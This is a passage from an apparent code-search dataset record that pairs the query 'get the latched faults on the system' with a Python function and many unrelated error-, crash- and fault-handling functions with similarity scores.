"def check_errors(self) -> None:\n # TODO check the manual for error codes & interpert them.\n return self.send(self.cmd.GET_GLOBALSTATUS_CURRENTERROR)",
"def clear_faults(self, session, params):\n\n session.set_status('running')\n yield self.acu_control.clear_faults()\n session.set_status('stopping')\n return True, 'Job completed.'",
"def get_number_of_crashes(result_info):\n assert isinstance(result_info, dict)\n # FIXME: We can't use analyse.get_generic_run_outcomes()\n # because we can't distinguish between a crash and an out\n # of memory situation properly\n #reports = analyse.get_generic_run_outcomes(result_info)\n is_merged_result = analyse.raw_result_info_is_merged(result_info)\n non_zero_exit_code_count = 0 # Only counted if it wasn't an out of memory run\n out_of_memory_count = 0\n if is_merged_result:\n assert isinstance(result_info['out_of_memory'], list)\n assert isinstance(result_info['exit_code'], list)\n assert len(result_info['out_of_memory']) == len(result_info['exit_code'])\n for index, oom in enumerate(result_info['out_of_memory']):\n corresponding_exit_code = result_info['exit_code'][index]\n if oom is True:\n out_of_memory_count += 1\n elif corresponding_exit_code is not None and corresponding_exit_code != 0:\n non_zero_exit_code_count += 1\n else:\n if result_info['out_of_memory'] is True:\n out_of_memory_count += 1\n elif result_info['exit_code'] is not None and result_info['exit_code'] != 0:\n non_zero_exit_code_count += 1\n return non_zero_exit_code_count + out_of_memory_count",
"def get_fault_info(filenames=['disk_sample_fault_tag.csv', 'disk_sample_fault_tag_201808.csv']):\n fault_df1 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[0]))\n fault_df2 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[1]))\n fault_df2.drop(['key'], axis=1,inplace=True)\n fault_tag_df = pd.concat([fault_df1, fault_df2], ignore_index=True)\n fault_dic = {}\n \n for _, row in fault_tag_df.iterrows():\n f_time = row[\"fault_time\"]\n tag = row[\"tag\"]\n key = tuple([row[\"manufacturer\"], row[\"model\"], row[\"serial_number\"]])\n if key not in fault_dic.keys():\n sub_dic = {}\n sub_dic[\"date\"] = f_time\n sub_dic[\"tag\"] = tag\n fault_dic[key] = sub_dic\n return fault_dic",
"def GetLongLineExceptions(self):\n return []",
"def diagnostic_trouble_codes(self):\n return self._diagnostic_trouble_codes",
"def get_exception_trap():\n return CRDS_EXCEPTION_TRAP",
"def get_crashing_anomaly_ids(self):\n\n crashing_anomalies = []\n\n for anomaly_id in self.get_anomaly_ids():\n if self.get_anomaly_error(anomaly_id) is not None:\n crashing_anomalies.append(anomaly_id)\n\n return crashing_anomalies",
"def GetFailures(self):\n return self._compute_client.all_failures",
"def server_fault(e):\n return \"Something went wrong, and it is our fault. Try reloading the page.\"",
"def dependencies(self):\n return self._dependency_analyzer.GetDependencies(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def trace(context=1):\r\n return getinnerframes(sys.exc_info()[2], context)",
"def Errcheck(self) -> list:\n\n myError = []\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n if int(Error) == 0:\n\n print (\"+0, No Error!\")\n\n else:\n\n while int(Error)!=0:\n\n print (\"Error #: \" + ErrorList[0])\n\n print (\"Error Description: \" + ErrorList[1])\n\n myError.append(ErrorList[0])\n\n myError.append(ErrorList[1])\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n myError = list(myError)\n\n return myError",
"def get_fatal_alerts(self, path):",
"def get_resources():\n # Acquire the lock...\n get_resources_lock.acquire()\n\n # ...but always release it\n try:\n # Construct the dictionaries as copies from nanny\n (limits,usage) = nanny.get_resource_information()\n\n\n # Calculate all the usage's\n pid = os.getpid()\n\n # Get CPU and memory, this is thread specific\n if ostype in [\"Linux\", \"Darwin\"]:\n \n # Get CPU first, then memory\n usage[\"cpu\"] = os_api.get_process_cpu_time(pid)\n\n # This uses the cached PID data from the CPU check\n usage[\"memory\"] = os_api.get_process_rss()\n\n # Get the thread specific CPU usage\n usage[\"threadcpu\"] = os_api.get_current_thread_cpu_time() \n\n\n # Windows Specific versions\n elif ostype in [\"Windows\"]:\n \n # Get the CPU time\n usage[\"cpu\"] = windows_api.get_process_cpu_time(pid)\n\n # Get the memory, use the resident set size\n usage[\"memory\"] = windows_api.process_memory_info(pid)['WorkingSetSize'] \n\n # Get thread-level CPU \n usage[\"threadcpu\"] = windows_api.get_current_thread_cpu_time()\n\n # Unknown OS\n else:\n raise EnvironmentError(\"Unsupported Platform!\")\n\n # Use the cached disk used amount\n usage[\"diskused\"] = cached_disk_used\n\n finally:\n # Release the lock\n get_resources_lock.release()\n\n # Copy the stop times\n stoptimes = process_stopped_timeline[:]\n\n # Return the dictionaries and the stoptimes\n return (limits,usage,stoptimes)",
"def emergency_recover_states_from_failure():\n _emergency_state_check()\n _emergency_iobuf_extract()",
"def exc_info(self):\n ei = self._exc_info\n if ei is not None and ei[0] is not None:\n return (\n ei[0],\n ei[1],\n # The pickled traceback may be None if we couldn't pickle it.\n load_traceback(ei[2]) if ei[2] else None\n )",
"def exception_stacktrace(self):\n # type: () -> list[string_types]\n return self._exception_stacktrace",
"def get_crash_events_data(self, tc_name):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)",
"def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]",
"def get_internal_errors(self) -> Dict[str, int]:\n self.serial.write(b\"D!\")\n values = self.__read_response(4)\n first_address_byte_errors = self.__extract_int(values[0], b\"!E1\")\n command_byte_errors = self.__extract_int(values[1], b\"!E2\")\n second_address_byte_errors = self.__extract_int(values[2], b\"!E3\")\n PEC_byte_errors = self.__extract_int(values[3], b\"!E4\")\n\n return {\n \"first_address_byte_errors\": first_address_byte_errors,\n \"command_byte_errors\": command_byte_errors,\n \"second_address_byte_errors\": second_address_byte_errors,\n \"PEC_byte_errors\": PEC_byte_errors,\n }",
"def error(self) -> list:\n return self.__err",
"def getCurrentSystemFunds(self):\n e = self.myParent.myEmpireDict\n d = self.myParent.mySystemDict\n return [e['CR'], d['AL'],d['EC'],d['IA']]",
"def getTraceback(self):\n self.mostLikelyPath = zeros((1, self.T+2))\n\n self.mostLikelyPath[0,0] = 0\n self.mostLikelyPath[0,-1] = self.noOfEmmittingStates+1\n\n for s in range(self.T, 0, -1):\n self.mostLikelyPath[0,s] = self.traceback[self.mostLikelyPath[0,s+1]-1, s]",
"def getCrashDumps(self):\r\n\r\n if len(core.FW_conf['connection']._getCrashDumps()):\r\n return True\r\n else:\r\n return False",
"def get_fault_index(self, device_type_name, fault_name, channel_number):\n if device_type_name in [\"SOLN\", \"BEND\", \"PBLM\", \"CBLM\", \"LBLM\", \"BLEN\", \"BLM\", \"KICK\"]:\n # For SOLN devices type, the fault name is \"Ix\",\n # where x is the integration channel\n integration_channel = int(fault_name[-1])\n\n if integration_channel not in range(4):\n raise ValueError(\"Function \\\"__get_fault_index(device_type_name={}, fault_name={}, channel_number={})\\\".\\\n Integration channel = {} out of range [0:3]\".format(device_type_name, fault_name,\n channel_number, integration_channel))\n\n return \"{}{}\".format(channel_number, integration_channel)\n else:\n # For other application, the get index from the following 2-D dict\n bpm_fault_index = { \"X\":\"0\", \"Y\":\"1\", \"TMIT\":\"2\" }\n bcm_fault_index = { \"CHARGE\":\"0\", \"DIFF\": \"1\" }\n fault_indexes = { \"BPMS\":bpm_fault_index,\n \"FARC\":bcm_fault_index,\n \"TORO\":bcm_fault_index }\n return fault_indexes[device_type_name][fault_name]",
"def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)",
"def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]",
"def getFatalErrors(self):\n global hadFatalErrors\n if hadFatalErrors:\n text = '\\n'.join(hadFatalErrors)\n hadFatalErrors = []\n return text",
"def problems(self):\n return self.configuration.problems",
"def refined_errors(self):\r\n errs = []\r\n for err in self.errors:\r\n if err['typo'].lower() not in self.terms:\r\n errs.append(err)\r\n return errs",
"def _get_failed_stack_events(stack_name: str, region: str, profile: str = None) -> list:\n logger.debug(f\"getting stack {stack_name} failure events in region {region}\")\n cfn_client = _get_cfn_client(region=region, profile=profile)\n try:\n events = cfn_client.describe_stack_events(StackName=stack_name)\n except Exception as e:\n logger.error(f\"unable to get stack events\")\n logger.error(e)\n raise e\n result = list()\n for event in events['StackEvents']:\n if \"FAILED\" in event['ResourceStatus']:\n result.append(event)\n if len(result) == 0:\n # There were no FAILED events. Look for ROLLBACK_IN_PROGRESS\n for event in events['StackEvents']:\n if \"ROLLBACK_IN_PROGRESS\" in event['ResourceStatus']:\n result.append(event)\n logger.debug(f\"failure events {result}\")\n return result",
"def retrieve_error_messages(self):\n return self.errors_seen[:]",
"def describe_service_errors(StackId=None, InstanceId=None, ServiceErrorIds=None):\n pass",
"def errors(self) -> List[Error]:",
"def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors",
"def traces(self):\n if self._traces is None:\n raise NotImplementedError(\"Weak implementation not supported\")\n else:\n return self._traces",
"def get_errors(self):\n return [result for result in self.values() if result.outcome == Result.ERROR]",
"def checkExceptions(self):\n\n nwarn = 0\n\n icatExceptionType = self.client.factory.create('icatExceptionType')\n schemaexceptions = set(icatExceptionType.__keylist__)\n clientexceptions = set(icat.exception.IcatExceptionTypeMap.keys())\n missing = schemaexceptions - clientexceptions\n if missing:\n log.warning(\"missing exception types: %s\", list(missing))\n nwarn += 1\n\n return nwarn",
"def get_error(self) -> List[str]:\n return []",
"def get_error(self) -> List[str]:\n return []",
"def detect_fatal_errors(self):\n for instance in self.all_instances:\n instance.detect_fatal_errors()",
"def GetAll(self):\n return self._errors.copy()",
"def execute(session, files):\n return TopVehicleCrashes.__process(TopVehicleCrashes, session, files)",
"def _get_errors(exc):\n if hasattr(exc, 'message'):\n errors = exc.messages\n else:\n errors = [str(exc)]\n return errors",
"def means_missing(self):\n return self.fault_code in (32, 33)",
"def display_minutni_fault_info(self, fault):\r\n args = {'id':self.minutniId,\r\n 'statusString':fault}\r\n self.emit(QtCore.SIGNAL('get_minutni_fault_info(PyQt_PyObject)'), args)",
"def GetExpectedCrashes(self, args: ct.TestArgs) -> None:\n # args[0] is the PixelTestPage for the current test.\n return args[0].expected_per_process_crashes",
"def freak():\n with settings(hide('everything'), warn_only=True):\n result = []\n try:\n check = sudo('lsof | grep DEL | grep -e crypto -e libssl')\n if check.return_code == 1:\n result = 'OK'\n logging.warning(\"%s: %s\" % (env.host, result))\n else:\n services = check.split('\\r')\n for service in services:\n service_name = service.split()[0]\n result.append(service_name)\n result = list(set(result))\n print(\"%s: VULNERABLE: %s\" % (env.host, ' '.join(result)))\n logging.warning(\"%s: VULNERABLE: %s\" % (env.host,\n ' '.join(result)))\n except Exception as e:\n logging.warning('%s: Error: %s' % (env.host, e.message))",
"def errorbars (self):\n return self._errorbars",
"def get_fault_type_label(self, cavity_number):\n # Make sure we received a valid cavity number\n self.assert_valid_cavity_number(cavity_number)\n\n # Load fault type model and make a prediction on the current example's features\n fault_idx, fault_confidence = self.make_prediction(self.fault_onnx_session)\n\n # Get the fault name and probability associated with that index\n fault_names = [\"Quench_100ms\", \"Quench_3ms\", \"E_Quench\", \"Heat Riser Choke\", \"Microphonics\", \"Controls Fault\",\n \"Single Cav Turn off\"]\n fault_name = fault_names[fault_idx]\n\n return {'fault-label': fault_name, 'fault-confidence': fault_confidence}",
"def getFailedJobs(self):\n return self.__failedJobs",
"def getErrorsList(self):\n return self.__errors",
"def get_sysfds(self):\n return [self._ptr.contents.sysfds[i] for i in range(RUSS_CONN_NSYSFDS)]",
"def get_aborted_actions(self):\n return self.failed",
"def get_traceback(self, i):\n (_, (_, _, tb)) = self.get_exception()\n\n while i and tb.tb_next:\n tb = tb.tb_next\n i -= 1\n\n return tb",
"def get_spitfp_error_count(self):\n return GetSPITFPErrorCount(*self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_GET_SPITFP_ERROR_COUNT, (), '', 'I I I I'))",
"def dependency_rolls(self):\n return self._dependency_analyzer.GetDependencyRolls(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def all_errata(self):\n return self._all_errata",
"def getSyscallHooks(self):\n return None",
"def getErrorTableIndex(self, *args):\n return _libsbml.FbcExtension_getErrorTableIndex(self, *args)",
"def traceback(self):",
"def errors_fatal(self) -> List[Error]:\n return self._errors_fatal_files + self._errors_fatal"
] | [
"0.7297142",
"0.6973599",
"0.62839913",
"0.6233432",
"0.6117404",
"0.5914989",
"0.585911",
"0.5828832",
"0.56888837",
"0.5640751",
"0.5596669",
"0.55570495",
"0.5398989",
"0.5372518",
"0.5344608",
"0.5326614",
"0.52823734",
"0.525599",
"0.5215235",
"0.5206905",
"0.51792276",
"0.51715744",
"0.51645386",
"0.5153811",
"0.51442236",
"0.5125883",
"0.5123245",
"0.5093789",
"0.50876576",
"0.50817794",
"0.5032068",
"0.5025616",
"0.4981695",
"0.4981695",
"0.4980397",
"0.49771124",
"0.49738127",
"0.49723223",
"0.4921869",
"0.4915626",
"0.4901078",
"0.48889944",
"0.48836654",
"0.48517585",
"0.4849374",
"0.48324996",
"0.48176455",
"0.4802844",
"0.47814584",
"0.4777862",
"0.47610652",
"0.47609344",
"0.47511852",
"0.4740264",
"0.4733746",
"0.47331813",
"0.47296825",
"0.47276458",
"0.47261629",
"0.4720682",
"0.47180402",
"0.4714924",
"0.47041366",
"0.47032252",
"0.46961823",
"0.4691959",
"0.46909627",
"0.46824005",
"0.4668972",
"0.46686617",
"0.46554092",
"0.46504578",
"0.46438566",
"0.4634459",
"0.46245202",
"0.46169472",
"0.46156654",
"0.46156654",
"0.46139967",
"0.46054542",
"0.46039313",
"0.46025866",
"0.45971525",
"0.4595424",
"0.4589683",
"0.45861518",
"0.4584958",
"0.4583668",
"0.45823526",
"0.4578836",
"0.4576294",
"0.45666933",
"0.45558944",
"0.45450717",
"0.45297772",
"0.4518949",
"0.45095977",
"0.4505974",
"0.45040157",
"0.44922727"
] | 0.82058364 | 0 |
This will get the latched faults on the system. | def get_faults_latched(self):
request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_LATCHED], BP_TOOL.REQUEST_16)
return self.__get_faults_list(self.config_16.faults_latched) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_faults_current(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_ACTIVE], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_current)",
"def faults(self):\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n faults = \" \"\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,bits = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n else:\n fault_names = {0:\"Tank Level Low\",2:\"Temperature above alarm range\",\n 4:\"RTD Fault\",5:\"Pump Fault\",7:\"Temperature below alarm range\"}\n faults = \"\"\n for i in range(0,8):\n if (bits >> i) & 1:\n if i in fault_names: faults += fault_names[i]+\", \"\n else: faults += str(i)+\", \"\n faults = faults.strip(\", \")\n if faults == \"\": faults = \"none\"\n debug(\"Faults %s\" % faults)\n return faults",
"def _extend_fault_map(self):\n faults.FAULT_MAP.update({nsx_lib_exc.ManagerError:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.ServiceClusterUnavailable:\n webob.exc.HTTPServiceUnavailable,\n nsx_lib_exc.ClientCertificateNotTrusted:\n webob.exc.HTTPBadRequest,\n nsx_exc.SecurityGroupMaximumCapacityReached:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.NsxLibInvalidInput:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxENSPortSecurity:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxPluginTemporaryError:\n webob.exc.HTTPServiceUnavailable\n })",
"def fault():\n return FaultCohesiveKin()",
"def __get_faults_list(self, faults):\n r_faults = []\n for x in faults:\n if faults[x]['value']:\n r_faults.append(faults[x]['name'])\n return r_faults",
"def faulty(self, *args):\n for each in args:\n if not self.is_faulty(each):\n self._faults.add(each)",
"def errors_fatal(self) -> List[Error]:",
"def emergency_recover_states_from_failure():\n _emergency_state_check()\n _emergency_iobuf_extract()",
"def check_page_faults(con, host, warning, critical,perf_data):\n warning = warning or 10\n critical = critical or 30\n data=get_server_status(con)\n\n try:\n page_faults=float(data['extra_info']['page_faults']) \n except:\n # page_faults unsupported on the underlaying system\n return exit_with_general_critical(\"page_faults unsupported on the underlaying system\")\n \n err,delta=maintain_delta([page_faults],host,\"page_faults\")\n if err==0:\n page_faults_ps=delta[1]/delta[0]\n message = \"Page faults : %.2f ps\" % page_faults_ps\n message+=performance_data(perf_data,[(\"%.2f\" %page_faults_ps,\"page_faults_ps\",warning,critical)])\n return check_levels(page_faults_ps,warning,critical,message)\n else:\n return exit_with_general_warning(\"problem reading data from temp file\")",
"def GetLongLineExceptions(self):\n return []",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def page_fault(self):\n self._page_fault += 1",
"def fault_counters(self):\n done, data = self._request('GF')\n if done:\n return {\n 'GFI self test': int(data[0], 16),\n 'Ground': int(data[1], 16),\n 'Stuck relay': int(data[2], 16)\n }\n\n raise EvseError",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def get_faults_history(self, epg_dn):\n class_query = ClassQuery('faultRecord')\n class_query.propFilter = 'eq(faultRecord.affected, \"' + epg_dn + '\")'\n return self.moDir.query(class_query)",
"def get_unexpected_reboots(self):\n\n _, remaining_bootups = self.get_unmatched_events(\n event_cause_label=\"basic.reboot_trigger\",\n event_effect_label=\"basic.bootup\")\n\n return remaining_bootups",
"def detect_fatal_errors(self):\n for instance in self.all_instances:\n instance.detect_fatal_errors()",
"def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]",
"def read_fault(filename):\n\n fault_x = []\n fault_y = []\n fault_file = open(filename)\n\n for segment in fault_file:\n x, y = segment.split()\n fault_x.append(float(x))\n fault_y.append(float(y))\n\n fault_file.close()\n\n return fault_x, fault_y",
"def _GetAbortRequests(self):\n new_requests = self._GetRequestsByState(self._ABORTING)\n for request_id in new_requests:\n logging.info('Abort requested for %s', request_id)\n self._ClearRequest(request_id, self._ABORTING)\n return new_requests",
"def refined_errors(self):\r\n errs = []\r\n for err in self.errors:\r\n if err['typo'].lower() not in self.terms:\r\n errs.append(err)\r\n return errs",
"def panic_on_fault_enabled(self):\n # The panic_on_fault mechanism might not even be included in the build\n # (in which case the panic_on_fault variables won't exist), so be defensive.\n try:\n enabled = self.chipdata.get_var_strict(\n 'L_panic_on_fault_enabled'\n ).value\n fault_id = self.chipdata.get_var_strict(\n 'L_panic_on_fault_id'\n ).value\n except ct.DebugInfoNoVariable:\n enabled = False\n fault_id = 0\n return (enabled, fault_id)",
"def pageFault(proc):\n\n global pfList\n pfList.append([proc, 1])",
"def test_crash_process(self):\n def_bucket = self.cluster.buckets[0]\n target_node = self.getTargetNode()\n remote = RemoteMachineShellConnection(target_node)\n target_vbuckets = range(0, self.cluster.vbuckets)\n retry_exceptions = list()\n self.transaction_load_task = None\n self.doc_loading_task = None\n self.N1ql_load_task = None\n\n # If Memcached is killed, we should not perform KV ops on\n # particular node. If not we can target all nodes for KV operation.\n if self.process_name == \"memcached\":\n target_vbuckets = Cbstats(target_node).vbucket_list(\n def_bucket.name, self.target_node)\n if self.target_node == \"active\":\n retry_exceptions = [SDKException.TimeoutException]\n if len(target_vbuckets) == 0:\n self.log.error(\"No target vbucket list generated to load data\")\n remote.disconnect()\n return\n\n bucket_dict = BucketUtils.get_random_collections(\n self.cluster.buckets,\n req_num=1,\n consider_scopes=\"all\",\n consider_buckets=\"all\")\n\n bucket = BucketUtils.get_bucket_obj(self.cluster.buckets,\n bucket_dict.keys()[0])\n scope_name = bucket_dict[bucket.name][\"scopes\"].keys()[0]\n collection_name = bucket_dict[bucket.name][\n \"scopes\"][scope_name][\"collections\"].keys()[0]\n scope = BucketUtils.get_scope_obj(\n bucket, scope_name)\n collection = BucketUtils.get_collection_obj(\n scope, collection_name)\n\n self.start_doc_loading_tasks(target_vbuckets, scope_name, collection)\n\n task_info = dict()\n task_info[self.doc_loading_task] = \\\n self.bucket_util.get_doc_op_info_dict(\n def_bucket, DocLoading.Bucket.DocOps.CREATE, 0,\n replicate_to=self.replicate_to, persist_to=self.persist_to,\n durability=self.durability_level,\n timeout=self.sdk_timeout, time_unit=\"seconds\",\n retry_exceptions=retry_exceptions)\n\n self.sleep(10, \"Wait for doc_ops to start\")\n self.log.info(\"Killing {0}:{1} on node {2}\"\n .format(self.process_name, self.service_name,\n target_node.ip))\n remote.kill_process(self.process_name, self.service_name,\n signum=signum[self.sig_type])\n remote.disconnect()\n # Wait for tasks completion and validate failures\n if self.transaction_load_task:\n self.task.jython_task_manager.get_task_result(\n self.transaction_load_task)\n if self.N1qltxn:\n self.task.jython_task_manager.get_task_result(\n self.N1ql_load_task)\n self.task_manager.get_task_result(self.doc_loading_task)\n self.bucket_util.verify_doc_op_task_exceptions(task_info,\n self.cluster)\n self.bucket_util.log_doc_ops_task_failures(task_info)\n\n # Verification stats\n verification_dict = dict()\n verification_dict[\"ops_create\"] = 2*self.num_items\n verification_dict[\"sync_write_aborted_count\"] = 0\n verification_dict[\"rollback_item_count\"] = 0\n verification_dict[\"pending_writes\"] = 0\n if self.__is_sync_write_enabled:\n verification_dict[\"sync_write_committed_count\"] = 2*self.num_items\n\n if self.bucket_type == Bucket.Type.EPHEMERAL \\\n and self.process_name == \"memcached\":\n result = self.task.rebalance(self.cluster, [], [])\n self.assertTrue(result, \"Rebalance failed\")\n\n # Validate doc count\n if self.process_name != \"memcached\":\n stats_failed = \\\n self.durability_helper.verify_vbucket_details_stats(\n def_bucket, self.cluster_util.get_kv_nodes(self.cluster),\n vbuckets=self.cluster.vbuckets,\n expected_val=verification_dict)\n if stats_failed:\n self.fail(\"Cbstats verification failed\")\n\n # Doc count validation per collection\n if not self.N1qltxn and self.atomicity is False:\n self.bucket_util.validate_docs_per_collections_all_buckets(\n self.cluster)",
"def pin_errors(self):\n for m in range(self.stage_width_list[-1]):\n error, _ = rqrmilib.calculate_submodel_error(self._get_native_object(), self.probe, len(self)-1, m)\n if error < 0: error = 0\n self.error_list[m] = int(error)\n self.rqrmi_state_changed = True\n return self.error_list",
"def check_for_initial_crash(test_runner, crash_retries, testcase):\n crash_times = []\n flaky_stack = False\n saved_crash_state = None\n saved_security_flag = None\n saved_unsymbolized_crash_state = None\n\n results = test_runner.execute_parallel_runs(crash_retries)\n\n for result in results:\n if not result.is_crash():\n continue\n\n if result.should_ignore():\n continue\n\n crash_state = result.get_state(symbolized=True)\n security_flag = result.is_security_issue()\n unsymbolized_crash_state = result.get_state(symbolized=False)\n\n if not unsymbolized_crash_state:\n continue\n\n if security_flag != testcase.security_flag:\n continue\n\n crash_times.append(result.crash_time)\n\n if not saved_crash_state:\n saved_crash_state = crash_state\n saved_security_flag = security_flag\n saved_unsymbolized_crash_state = unsymbolized_crash_state\n continue\n\n crash_comparer = CrashComparer(crash_state, saved_crash_state)\n if not crash_comparer.is_similar():\n flaky_stack = True\n\n logs.log('Total crash count: %d/%d. Flaky: %s. Security: %s. State:\\n%s' %\n (len(crash_times), crash_retries, flaky_stack, saved_security_flag,\n saved_crash_state))\n\n return saved_unsymbolized_crash_state, flaky_stack, crash_times",
"def _add_faults(self, feature_builder, features=None):\n if features is None:\n features = self.features\n for f in reversed(features):\n if f.type == 'fault':\n feature_builder.add_fault(f)\n # if f.type == 'unconformity':\n # break",
"def fault(self):\n return (self.status == self.STATUS_FAULT)",
"def is_faulty(self, event):\n for each in self._faults:\n if each.name.upper() == event.name.upper():\n return True\n return False",
"def find_traceback_start(self):\n ### FILL IN ###",
"def _handle_resource_exhausted_error():\n _debug_print(\n \"Traceback that led to resource exhaustion handling: \" + traceback.format_exc()\n )\n time.sleep(3)",
"def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors",
"def test_crash_races(self, exit_on_deadlock, n_proc):\n # Test for external crash signal comming from neighbor\n # with various race setup\n util.debug(\"Test race - # Processes = {}\".format(n_proc))\n executor = get_reusable_executor(max_workers=n_proc)\n pids = list(executor._processes.keys())\n assert len(pids) == n_proc\n assert None not in pids\n res = executor.map(work_sleep, [(.0001 * (j//2), pids)\n for j in range(2 * n_proc)])\n assert all(list(res))\n with pytest.raises(BrokenExecutor):\n res = executor.map(kill_friend, pids[::-1])\n list(res)",
"def get_crashing_anomaly_ids(self):\n\n crashing_anomalies = []\n\n for anomaly_id in self.get_anomaly_ids():\n if self.get_anomaly_error(anomaly_id) is not None:\n crashing_anomalies.append(anomaly_id)\n\n return crashing_anomalies",
"def sys_exc_info(self, for_hidden=False):\n return self.gettopframe()._exc_info_unroll(self.space, for_hidden)",
"def get_fault_info(filenames=['disk_sample_fault_tag.csv', 'disk_sample_fault_tag_201808.csv']):\n fault_df1 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[0]))\n fault_df2 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[1]))\n fault_df2.drop(['key'], axis=1,inplace=True)\n fault_tag_df = pd.concat([fault_df1, fault_df2], ignore_index=True)\n fault_dic = {}\n \n for _, row in fault_tag_df.iterrows():\n f_time = row[\"fault_time\"]\n tag = row[\"tag\"]\n key = tuple([row[\"manufacturer\"], row[\"model\"], row[\"serial_number\"]])\n if key not in fault_dic.keys():\n sub_dic = {}\n sub_dic[\"date\"] = f_time\n sub_dic[\"tag\"] = tag\n fault_dic[key] = sub_dic\n return fault_dic",
"def fault_code(self):\n from numpy import nan\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n fault_code = nan\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,fault_code = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n fault_code = nan\n if fault_code == 2.0**7:\n fault_code = 8\n elif fault_code == 2.0**6:\n fault_code = 7\n elif fault_code == 2.0**5:\n fault_code = 6\n elif fault_code == 2.0**4:\n fault_code = 5\n elif fault_code == 2.0**3:\n fault_code = 4\n elif fault_code == 2.0**2:\n fault_code = 3\n elif fault_code == 2.0**1:\n fault_code = 2\n elif fault_code == 2.0**0:\n fault_code = 1\n elif fault_code == 0:\n fault_code = 0\n else:\n fault_code = -1\n debug(\"Fault code %s\" % fault_code)\n return fault_code",
"def _process_failures(self, target):\n crash_synopses = self._fuzz_data_logger.failed_test_cases.get(self._fuzz_data_logger.all_test_cases[-1], [])\n if len(crash_synopses) > 0:\n self._fuzz_data_logger.open_test_step(\"Failure summary\")\n\n # retrieve the primitive that caused the crash and increment it's individual crash count.\n self.crashing_primitives[self.fuzz_node.mutant] = self.crashing_primitives.get(self.fuzz_node.mutant, 0) + 1\n self.crashing_primitives[self.fuzz_node] = self.crashing_primitives.get(self.fuzz_node, 0) + 1\n\n # print crash synopsis\n if len(crash_synopses) > 1:\n # Prepend a header if > 1 failure report, so that they are visible from the main web page\n synopsis = \"({0} reports) {1}\".format(len(crash_synopses), \"\\n\".join(crash_synopses))\n else:\n synopsis = \"\\n\".join(crash_synopses)\n self.procmon_results[self.total_mutant_index] = crash_synopses\n self._fuzz_data_logger.log_info(synopsis)\n\n if self.fuzz_node.mutant is not None and \\\n self.crashing_primitives[self.fuzz_node] >= self._crash_threshold_node:\n skipped = self.fuzz_node.num_mutations() - self.fuzz_node.mutant_index\n self._skip_current_node_after_current_test_case = True\n self._fuzz_data_logger.open_test_step(\n \"Crash threshold reached for this request, exhausting {0} mutants.\".format(skipped))\n self.total_mutant_index += skipped\n self.fuzz_node.mutant_index += skipped\n elif self.fuzz_node.mutant is not None and \\\n self.crashing_primitives[self.fuzz_node.mutant] >= self._crash_threshold_element:\n if not isinstance(self.fuzz_node.mutant, primitives.Group)\\\n and not isinstance(self.fuzz_node.mutant, blocks.Repeat):\n skipped = self.fuzz_node.mutant.num_mutations() - self.fuzz_node.mutant.mutant_index\n self._skip_current_element_after_current_test_case = True\n self._fuzz_data_logger.open_test_step(\n \"Crash threshold reached for this element, exhausting {0} mutants.\".format(skipped))\n self.total_mutant_index += skipped\n self.fuzz_node.mutant_index += skipped\n\n self.restart_target(target)\n return True\n else:\n return False",
